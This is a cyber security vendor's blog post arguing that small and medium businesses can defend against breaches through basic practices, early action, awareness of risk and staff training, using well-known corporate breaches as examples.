Bulletproof’s range of cyber security, data protection and compliance services are your best defence against threats to your business. With nearly a decade of providing trusted security services, we’re continuing our mission of solving the greatest cyber security & compliance challenges through innovation and simplicity. Explore our range of services and find out how Bulletproof can help your business.
Helping people solve their security challenges is what we do, so we’re always keen to hear from you.
Discover CREST penetration testing & continuous security
Internal & external infrastructure, network & system testing
Manage multiple tests & get external security assurance
Thoroughly assess your web apps & APIs for security flaws
Test your response to a simulated real-world cyber attack
All cloud platforms & services tested, including Azure & AWS
Test your human cyber defences with social engineering
Android, iOS & custom mobile application security testing
Find out more about penetration testing – what it is, when you need it, and why it’s a core component of any business. Discover how pen test helps with compliance, powers best practices, and helps your organisation win new business.
Gap analysis, implementation, audits & more from GDPR experts
On-going support to easily manage your data protection obligations
Consultant-led support to meet all levels of DSPT submission
Flexible & engaging data protection training from certified experts
Get peace of mind that your data protection is being managed by trusted, certified consultants. All Bulletproof data protection services are delivered by our highly trained, experienced and qualified staff.
Gap analysis, implementation, audits & more from dedicated ISO consultants
Find the next step in your strategy with this consultant-led assessment
Get quick & easy CE certification with a range of feature-packed packages
Flexible access to top-tier information security strategy & management
Experienced SOC 2 consultants, AICA audits & compliance automation platform
On-site, remote and video-based security training to boost your resilience
Affordable expertise & support to help you meet & maintain PCI DSS compliance
Go beyond compliance with information security services that are designed to give real operational benefits to your business. All delivered by seasoned, certified Bulletproof security consultants.
24/7 defence against cyber attacks with proactive threat detection
Get help responding & recovering from cyber incidents
Detect, analyse and stop cyber attacks with real-time prevention
Forensic support & data recovery following cyber attacks
Stay on top of new vulnerabilities with powerful, flexible scanning
Evaluate your wireless network for security weaknesses
Discover how your business can identify & manage cyber threats
Comply with regulations, meet certification standards & best practices
Train and test your staff for security resilience, data protection & compliance
No matter what your cyber or compliance challenges, Bulletproof is here to help. We like to work with you as a trusted partner to solve problems, not sell services. No pressure tactics and no false promises.
Learn about our mission to make cyber & compliance accessible to all
Grow your business with high-margin, high-value & partner-ready services
Become part of the Bulletproof team & supercharge your career
Bulletproof’s in-house SOC powers our Managed SIEM & MDR services
We love to talk. Tell us about your cyber & compliance challenges
At Bulletproof we love to solve problems with simplicity & innovation. It’s our mission to make compliance & cyber security services accessible to all. We take pride in building and nurturing teams of exceptional talent, so we’re confident that our cyber security & compliance services are the best way to stay one step ahead of the hackers and protect your business.
Helping people solve their security challenges is what we do, so we’re always keen to hear from you, no matter what you have to say.
Get the latest news, views & expert insight in the world of cyber security, data protection & compliance
A helpful index of cyber security terms, compliance acronyms and industry terminology to make life easy
Discover what we have to say about the threat landscape & what businesses need to know to get ahead
Find out how we can make companies like yours Bulletproof. Don’t take our word for it, hear direct from our clients
Detailed insights & helpful tips for understanding penetration testing, data protection & more
Interesting data & top tips at a glance, with insightful infographics covering all areas of cyber security & compliance
Watch our experts talk through their thoughts & opinions on a variety of security & compliance topics
See when & where we’re going to be bringing Bulletproof insight to an event near you
Ayisha Bari
Find out what ransomware is, how attacks work & types of attack to help you get started with keeping ransomware out of your business.
Read More
EasyJet, CapitalOne, British Airways and Marriott are all huge companies with equally large budgets. Another thing they have in common is they all fell victim to a serious data breach, costing them hundreds of millions of pounds. If the major players with a lot of resources to devote to cyber security still get hacked, do SMEs with limited budgets stand a chance? It’s a dramatic question, so let’s explore the answer.
Firstly, the four aforementioned breaches were different. CapitalOne was breached via exploiting a misconfigured web application firewall (WAF). British Airways fell victim to card skimming, wherein a few lines of code embedded into a website snatch data as it is sent. Whilst the exact details haven’t been explicitly released, the Marriott breach involved a Remote Access Trojan (RAT) and the presence of Mimikatz, which can give hackers administrative access and dumps passwords from memory. How these got on Marriott’s systems isn’t known, but there’s a good chance it’s down to phishing. As for the latest breach of the four (easyJet), details are still thin on the ground on what actually happened, but that hasn’t stopped them from facing an £18 billion class-action lawsuit.
It’s important to know these, because it could be said that these well publicised breaches boil down to ‘best practices’. And, generally speaking, best practices aren’t reliant on expensive hardware or elite teams of cyber defenders – it’s just about getting the basics right. So here’s our first lesson for SMEs: get the basics right, and you’ll find yourself more secure than multi-national corporations. To take the CapitalOne breach as an example, a simple penetration test could have revealed the WAF misconfigurations. And annual penetration tests are one of the bare minimum best practices for cyber security – that’s why they’re mandated by the likes of PCI DSS, ISO 27001 and more.
The fact is that cyber threats to businesses are many and varied. Hackers can compromise an organisation in a number of different ways, from injecting their own scripts, exploiting outdated software or even through simple brute-forcing techniques. And that’s to say nothing of phishing and social engineering. Securing a business network and protecting data in a modern, dynamic environment is no easy task. There’s a lot to consider and a lot that can be overlooked.
This makes the wish list for an organisation’s cyber defences look long and expensive. To secure a business, you ideally need:
Not only can this cost a lot of money, but it will also need a lot of specific expertise as well as take up a lot of staff time. However, things here aren’t as bad as they seem. SMEs have an advantage in their smaller size. That's our second SME lesson: start acting right now. In the case of compliance, getting processes in-place and the right culture embedded now means your compliance (and, hopefully, your security) will grow naturally as your company expands. Cyber Essentials is the best first step to take here.
Likewise, if regular pen testing is always a part of your standard business practices, it’ll never become an obstruction to your growth. Even the high-ticket items such as 24/7 monitoring have options to make them affordable. Whilst the multinational enterprises will be building out their own SOCs, it makes much more sense for SMEs to take a managed option on a monthly retainer fee. All the service, all the expertise, none of the upfront cost.
You might think that the four well-known companies mentioned at the beginning are obvious targets. There’s more to be gained from hitting the big players after all, right? So SMEs don’t need to worry because they’re not likely to be of interest to the hacking community, right? Wrong. If you think that you won’t be of interest to hackers, you will get breached, and recovering from that hack may cost more than your turnover – especially if you are hit with regulatory fines (such as GDPR non-compliance).
This brings us to our third lesson for SMEs: understanding that companies are at risk of being breached regardless of size and service. The general rule is, the less time it takes to be hacked, the more profitable it is for a hacker. Opportunistic cyber criminals don’t care who you are, what you do, or how much (or little) data you have – an easy target is an easy target and will always be exploited. In fact, this is the exact scenario that led to the NHS being crippled by WannaCrypt ransomware back in 2017.
It’s often noted by Bulletproof penetration testers that even companies with solid security at the perimeter can be vulnerable internally. This means a compromised account, or a malicious insider, could still do some serious damage. But what if the hacker’s inside agent didn’t know they were helping the hackers? Welcome to social engineering, and it’s one of the most important threats that SMEs need to be aware of.
Hackers are likely to opt for the path of least resistance. And in a lot of cases, this will be your staff. An unwitting member of staff who opens a malware-laden attachment or clicks a malicious link in a phishing email can undo all your security measures. And whilst many phishing emails are easy to spot because of bad spelling and grammar, and strange ‘from’ email addresses, there are other phishing emails that are much more finely crafted and targeted.
Here then is our last lesson for SMEs, and it's simple, cheap and easy: train your staff. Helping them understand the dangers and their responsibility in protecting personal data will help ensure human error is kept to a minimum. Your staff can be your best line of cyber defence, or your worst threat. It’s up to you. Again, SME size and agility can help: in scheduling training, plus with on-line options it’s easier than ever.
The SME cyber security challenge is real, but so are the solutions. SMEs may think themselves outmanned and outgunned, but not investing in security can cost a lot more when you are hacked. Treating security as an afterthought puts your business in danger. And as this blog has shown, there are quick-wins available for even the smallest organisations. So for the skim readers and those who want a recap, here are Bulletproof’s top tips for SMEs to solve the security challenge:
Pen test annually, run VA scans monthly, and get Cyber Essentials certification (which is backed by UK Gov).
The longer you wait, the harder it will be to integrate security as a BAU practice. The sooner you act, the easier it will scale as your business grows.
Hackers don’t care who you are, only if you’re an easy target. Don’t make yourself one.
An unwitting staff member can undo all your hard work with a single click. Turn your greatest potential weakness into your greatest strength.
Learn more
Joe is a blogger and security evangelist who’s been raising the profile of cyber security for a decade. He writes about a variety of cyber and compliance topics, with a keen eye on translating events and data into valuable customer insights. Never boring, sometimes controversial, always insightful.
We’ve developed a suite of best-in-class cyber security tools and free consultancy, all accessible from a single, easy-to-use platform to help you identify your company’s risks and protect your assets. If you’re interested in learning more, get in touch at contact@bulletproof.co.uk.
If you are interested in our services, get a free, no obligation quote today by filling out the form below.
I'd like to receive Bulletproof communications about relevant services and events
For more information about how we collect, process and retain your personal data, please see our privacy policy.